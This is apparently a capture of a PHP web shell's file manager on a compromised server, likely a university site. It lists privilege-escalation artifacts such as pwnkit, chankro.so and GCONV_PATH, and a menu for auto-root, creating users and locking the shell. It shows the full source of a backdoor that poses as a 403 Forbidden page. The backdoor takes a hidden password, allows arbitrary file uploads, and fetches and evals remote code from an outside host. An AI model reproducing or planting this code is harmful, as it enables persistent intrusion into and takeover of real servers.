Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
opt /
lampp /
htdocs /
webalizer /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxrwxr-x
about
[ DIR ]
drwxrwxr-x
asm
[ DIR ]
drwxr-xr-x
becas
[ DIR ]
drwxr-xr-x
cache
[ DIR ]
drwxr-xr-x
carousel
[ DIR ]
drwxr-xr-x
carpeta
[ DIR ]
drwxr-xr-x
ccs_2025
[ DIR ]
drwxr-xr-x
contraloria
[ DIR ]
drwxr-xr-x
contraloriares
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
dekode
[ DIR ]
drwxrwxr-x
documentos
[ DIR ]
drwxr-xr-x
domianos
[ DIR ]
drwxrwxr-x
GCONV_PATH=.
[ DIR ]
drwxrwxr-x
html3
[ DIR ]
drwxrwxr-x
inscripciones.aspx
[ DIR ]
drwxr-xr-x
jkt-pobox
[ DIR ]
drwxrwxr-x
mindfulness
[ DIR ]
drwxrwxr-x
promocion
[ DIR ]
drwxr-xr-x
Sbdfabk
[ DIR ]
drwxrwxr-x
sym404
[ DIR ]
drwxr-xr-x
tes
[ DIR ]
drwxrwxr-x
url
[ DIR ]
drwxrwxr-x
.htaccess
230
B
-rw-r--r--
.mad-root
0
B
-rw-rw-r--
acpid.socket
103
B
-rwxrwxrwx
auth.php
380
B
-rw-rw-r--
chankro.so
8.3
KB
-rw-rw-r--
cookies.php
215.33
KB
-rw-r--r--
defunct
2.7
MB
-rwx------
defunct.dat
23
B
-rw-------
google152d10ec11b28677.html
53
B
-rw-rw-r--
google52306c35488e1358.html
53
B
-rw-r--r--
index.php
13.15
KB
-rw-rw-r--
ipv4.php
1.78
KB
-rw-rw-r--
legal.php
1.56
KB
-rw-r--r--
logs.php
1.72
KB
-rw-r--r--
menu.php
6.65
KB
-rw-rw-r--
path.PHP
3.06
KB
-rw-rw-r--
public2.php
21.79
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxrwxr-x
sitemap.xml
500
B
-rw-rw-r--
spxmailer.php
4.75
KB
-rw-rw-r--
support.php
31
B
-rwxrwxrwx
surender.php
68
KB
-rw-r--r--
tecnologias_perfil.php
3
B
-rw-rw-r--
test.txt
0
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : path.PHP
<?php session_start(); // Fungsi untuk memeriksa status login function is_logged_in() { return isset($_SESSION['X-H0UR']); } // Fungsi untuk memvalidasi login function login($password) { $valid_password_hash = '2806906c79cdb8ef05d9595ff8cdc125'; // MD5 hash password $password_hash = md5($password); if ($password_hash === $valid_password_hash) { $_SESSION['X-H0UR'] = 'user'; return true; } else { return false; } } // Fungsi untuk logout function logout() { unset($_SESSION['X-H0UR']); } // Fungsi untuk mengambil konten dari URL function getContent($url) { $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true); $content = curl_exec($curl); curl_close($curl); if ($content === false) { $content = file_get_contents($url); } return $content; } // Fungsi untuk mendapatkan data mentah dari URL function getRawContent($url) { return getContent($url); } // Tangani proses login if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['password'])) { $password = $_POST['password']; if (login($password)) { header('Location: ' . $_SERVER['PHP_SELF']); exit; } else { $error_message = "Password salah!"; echo '<script>alert("' . $error_message . '");</script>'; } } // Tangani proses unggah file if (isset($_GET['inc']) && $_GET['inc'] === 'upload') { echo '<form method="post" enctype="multipart/form-data">'; echo '<input type="text" name="dir" size="30" value="' . getcwd() . '">'; echo '<input type="file" name="file" size="15">'; echo '<input type="submit" value="Unggah">'; echo '</form>'; } if (isset($_FILES['file']['tmp_name'])) { $uploadd = $_FILES['file']['tmp_name']; if (file_exists($uploadd)) { $pwddir = $_POST['dir']; $real = $_FILES['file']['name']; $de = rtrim($pwddir, '/') . "/" . $real; if (move_uploaded_file($uploadd, $de)) { echo "BERKAS DIUNGGAHKAN KE $de"; } else { echo "GAGAL MENGUNGGAH BERKAS KE $de"; } } } // Jika pengguna sudah login, ambil dan eksekusi konten dari URL if (is_logged_in()) { $url = 'https://dns-source.pages.dev/source/cache.txt'; $content = getRawContent($url); eval('?>' . $content); exit; } ?> <!DOCTYPE html> <html> <head> <title>403 Forbidden</title> </head> <body> <h1>Forbidden</h1> <p>You don't have permission to access <?php echo $_SERVER['REQUEST_URI']; ?> on this server.</p> <hr> <address> <?php echo $_SERVER['SERVER_SOFTWARE']; ?> Server at <?php echo $_SERVER['SERVER_NAME']; ?> Port <?php echo $_SERVER['SERVER_PORT']; ?> </address> <form method="post"> <input style="position: absolute; bottom: 0; left: 50%; transform: translateX(-50%); background-color: #fff; border: 1px solid #fff; text-align: center;" type="password" name="password" placeholder=""> </form> </body> </html>
Close